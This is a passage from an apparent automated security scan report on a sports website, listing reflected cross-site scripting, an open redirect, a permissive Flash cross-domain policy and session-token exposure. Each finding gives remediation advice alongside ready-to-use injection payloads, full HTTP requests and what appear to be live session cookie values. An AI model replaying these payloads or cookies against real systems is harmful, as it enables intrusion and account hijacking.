Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video?vid=11488b72-869b-4def-9ea2-d302aaaf2581934a7"%3balert(1)//81751046272 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 204851
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=17
Date: Sat, 08 Jan 2011 00:43:41 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
deo.createWidget('Player1Container', 'Player', 640, 400, {"cbprefix": "Player.", "configCsid": "Fox%20Sports", "configName": "video_player", "player.defaultVidId": "11488b72-869b-4def-9ea2-d302aaaf2581934a7";alert(1)//81751046272", "player.c": "v", "player.v": "11488b72-869b-4def-9ea2-d302aaaf2581934a7";alert(1)//81751046272" }, 'Player1');</script>
...[SNIP]...

3.24. http://msn.foxsports.com/video/NFL [vid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /video/NFL

Issue detail

The value of the vid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67a15"%3balert(1)//d6d9c871e76 was submitted in the vid parameter. This input was echoed as 67a15";alert(1)//d6d9c871e76 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/NFL?vid=fd281445-422f-4072-b9ba-9091be6a810267a15"%3balert(1)//d6d9c871e76&from=foxsports/Home/headlines HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 204035
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=33
Date: Sat, 08 Jan 2011 00:58:28 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
deo.createWidget('Player1Container', 'Player', 640, 400, {"cbprefix": "Player.", "configCsid": "Fox%20Sports", "configName": "video_player", "player.defaultVidId": "fd281445-422f-4072-b9ba-9091be6a810267a15";alert(1)//d6d9c871e76", "player.c": "v", "player.v": "fd281445-422f-4072-b9ba-9091be6a810267a15";alert(1)//d6d9c871e76" }, 'Player1');</script>
...[SNIP]...

3.25. http://msn.foxsports.com/video/college-football [vid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /video/college-football

Issue detail

The value of the vid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60927"%3balert(1)//893fe2fe98 was submitted in the vid parameter. This input was echoed as 60927";alert(1)//893fe2fe98 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/college-football?vid=b22c5085-d0f5-494f-a5a9-b497c96d123260927"%3balert(1)//893fe2fe98&from=en-us_msnhp HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 204352
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=26
Date: Fri, 07 Jan 2011 21:53:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
deo.createWidget('Player1Container', 'Player', 640, 400, {"cbprefix": "Player.", "configCsid": "Fox%20Sports", "configName": "video_player", "player.defaultVidId": "b22c5085-d0f5-494f-a5a9-b497c96d123260927";alert(1)//893fe2fe98", "player.c": "v", "player.v": "b22c5085-d0f5-494f-a5a9-b497c96d123260927";alert(1)//893fe2fe98" }, 'Player1');</script>
...[SNIP]...

3.26. http://msn.foxsports.com/video/shows/what-the-fox [vid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /video/shows/what-the-fox

Issue detail

The value of the vid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c8f44"%3balert(1)//38ce12b4193 was submitted in the vid parameter. This input was echoed as c8f44";alert(1)//38ce12b4193 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/shows/what-the-fox?vid=f8283acb-2bc1-4a12-bb76-d24b6a25d55fc8f44"%3balert(1)//38ce12b4193&from=en-us_msnhp&gt1=39002 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 202021
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=22
Date: Fri, 07 Jan 2011 21:53:07 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
deo.createWidget('Player1Container', 'Player', 640, 400, {"cbprefix": "Player.", "configCsid": "Fox%20Sports", "configName": "video_player", "player.defaultVidId": "f8283acb-2bc1-4a12-bb76-d24b6a25d55fc8f44";alert(1)//38ce12b4193", "player.c": "v", "player.v": "f8283acb-2bc1-4a12-bb76-d24b6a25d55fc8f44";alert(1)//38ce12b4193" }, 'Player1');</script>
...[SNIP]...

4. Flash cross-domain policy

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

Request

GET /crossdomain.xml HTTP/1.1
Host: msn.foxsports.com
Proxy-Connection: keep-alive
Referer: http://msn.foxsports.com/component/flash/Toolbar
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; MUID=DC63BAA44C3843F38378B4BB213E0A6F; NetInsightSessionID=1; UnicaNIODID=desyou1VHJ2-Ww6pyII

Response

HTTP/1.1 200 OK
Last-Modified: Tue, 05 Oct 2010 12:10:32 GMT
ETag: W/"209-1286280632000"
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Content-Type: text/xml
Content-Length: 209
Cache-Control: private, max-age=50840
Date: Sat, 08 Jan 2011 01:10:54 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain
...[SNIP]...

5. Session token in URL

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://msn.foxsports.com
Path:   /module/pollaction

Issue detail

The URL in the request appears to contain a session token within the query string:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

Request

GET /module/pollaction;jsessionid=B0E37D9CEC4284C917EBD810E61F000A HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjMvR2anBaMaD; JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; pALERTED=TRUE; pLMD="2011-01-08 00:30:34"; pENC_LNAME=/wgeX1XilBI=; glt_2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25=LT1_wYGVkkgCTuOFWv1NpFDEqA%3D%3D; pRME=; UnicaNIODID=I7HpnSWrYC7-Ww6qltH; pUID=/k94ON71KoD/EYqOMDzIDg==; pENC_FNAME=Z1NVLTXWY1w=; _gig_mig=1; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCRNr9VH15cFkq7VpqEGMPu4ZQoCd8JiazfhiCz19aE8Rr96avqbADey4zfxh7OCe3ARE45iIC+SoOO4zwo+2imw1wriyE/gxP7lCgJ3wmJrN+KsXLdMDxGLAaQBnEGrlvs9ds+BKO8cGA+0bSRs6mbTfXoJRF4HgeglEUizR3jzAIsqs4dxIjPEOir71y3OLemXi49kGaq/9vS2x2YKiW+hc=; NetInsightSessionID=1; _chartbeat2=oxy92bi233plhtq3; pExternalUser=; MUID=65AFF4B77A124856A6B4337A160FA285; pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi9aLTkInIxcA; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8fa9C2mVIy0IJVI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAY6u9XpfOLODoWeR/uovPQww==; 
pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF+qMzS6uOiVeU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ;

Response

HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding
nnCoection: close
Date: Sat, 08 Jan 2011 01:29:13 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 10981

<html><head><title>Apache Tomcat/5.5.20 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans
...[SNIP]...

6. Open redirection

Summary

Severity:   Low
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /account/register

Issue detail

The value of the fu request parameter is used to perform an HTTP redirect. The payload http%3a//a1790e5775f23b218/a%3f was submitted in the fu parameter. This caused a redirection to the following URL:

Issue background

Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application which causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targeting the correct domain with a valid SSL certificate (if SSL is used), lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.

Issue remediation

If possible, applications should avoid incorporating user-controllable data into redirection targets. In many cases, this behaviour can be avoided in two ways:

If it is considered unavoidable for the redirection function to receive user-controllable input and incorporate this into the redirection target, one of the following measures should be used to minimize the risk of redirection attacks:

Request

GET /account/register?fu=http%3a//a1790e5775f23b218/a%3f HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjMvR2anBaMaD; JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; pALERTED=TRUE; pLMD="2011-01-08 00:30:34"; pENC_LNAME=/wgeX1XilBI=; glt_2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25=LT1_wYGVkkgCTuOFWv1NpFDEqA%3D%3D; pRME=; UnicaNIODID=I7HpnSWrYC7-Ww6qltH; pUID=/k94ON71KoD/EYqOMDzIDg==; pENC_FNAME=Z1NVLTXWY1w=; _gig_mig=1; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCRNr9VH15cFkq7VpqEGMPu4ZQoCd8JiazfhiCz19aE8Rr96avqbADey4zfxh7OCe3ARE45iIC+SoOO4zwo+2imw1wriyE/gxP7lCgJ3wmJrN+KsXLdMDxGLAaQBnEGrlvs9ds+BKO8cGA+0bSRs6mbTfXoJRF4HgeglEUizR3jzAIsqs4dxIjPEOir71y3OLemXi49kGaq/9vS2x2YKiW+hc=; NetInsightSessionID=1; _chartbeat2=oxy92bi233plhtq3; pExternalUser=; MUID=65AFF4B77A124856A6B4337A160FA285; pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi9aLTkInIxcA; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8fa9C2mVIy0IJVI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAY6u9XpfOLODoWeR/uovPQww==; 
pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF+qMzS6uOiVeU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ;

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Location: http://a1790e5775f23b218/a?
Content-Length: 0
Expires: Sat, 08 Jan 2011 01:11:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 08 Jan 2011 01:11:39 GMT
Connection: close


7. Cookie scoped to parent domain
There are 4 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


7.1. http://msn.foxsports.com/account/logout

Summary

Severity:   Low
Confidence:   Firm
Host:   http://msn.foxsports.com
Path:   /account/logout

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /account/logout HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjMvR2anBaMaD; JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; pALERTED=TRUE; pLMD="2011-01-08 00:30:34"; pENC_LNAME=/wgeX1XilBI=; glt_2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25=LT1_wYGVkkgCTuOFWv1NpFDEqA%3D%3D; pRME=; UnicaNIODID=I7HpnSWrYC7-Ww6qltH; pUID=/k94ON71KoD/EYqOMDzIDg==; pENC_FNAME=Z1NVLTXWY1w=; _gig_mig=1; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCRNr9VH15cFkq7VpqEGMPu4ZQoCd8JiazfhiCz19aE8Rr96avqbADey4zfxh7OCe3ARE45iIC+SoOO4zwo+2imw1wriyE/gxP7lCgJ3wmJrN+KsXLdMDxGLAaQBnEGrlvs9ds+BKO8cGA+0bSRs6mbTfXoJRF4HgeglEUizR3jzAIsqs4dxIjPEOir71y3OLemXi49kGaq/9vS2x2YKiW+hc=; NetInsightSessionID=1; _chartbeat2=oxy92bi233plhtq3; pExternalUser=; MUID=65AFF4B77A124856A6B4337A160FA285; pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi9aLTkInIxcA; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8fa9C2mVIy0IJVI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAY6u9XpfOLODoWeR/uovPQww==; 
pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF+qMzS6uOiVeU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ;

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Location: http://msn.foxsports.com/account/transition?fu=%2F&initiatingAction=logout
Content-Length: 0
Expires: Sat, 08 Jan 2011 01:12:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 08 Jan 2011 01:12:06 GMT
Connection: close
Set-Cookie: p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjMvR2anBaMaD; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pLMD="2011-01-08 00:30:34"; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pENC_LNAME=/wgeX1XilBI=; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: glt_2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25=LT1_wYGVkkgCTuOFWv1NpFDEqA%3D%3D; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pRME=; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: UnicaNIODID=I7HpnSWrYC7-Ww6qltH; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pUID=/k94ON71KoD/EYqOMDzIDg==; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pENC_FNAME=Z1NVLTXWY1w=; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _gig_mig=1; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pEFSUID=/k94ON71KoD/EYqOMDzIDg==; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCRNr9VH15cFkq7VpqEGMPu4ZQoCd8JiazfhiCz19aE8Rr96avqbADey4zfxh7OCe3ARE45iIC+SoOO4zwo+2imw1wriyE/gxP7lCgJ3wmJrN+KsXLdMDxGLAaQBnEGrlvs9ds+BKO8cGA+0bSRs6mbTfXoJRF4HgeglEUizR3jzAIsqs4dxIjPEOir71y3OLemXi49kGaq/9vS2x2YKiW+hc=; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: NetInsightSessionID=1; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _chartbeat2=oxy92bi233plhtq3; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pExternalUser=; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: MUID=65AFF4B77A124856A6B4337A160FA285; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi9aLTkInIxcA; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
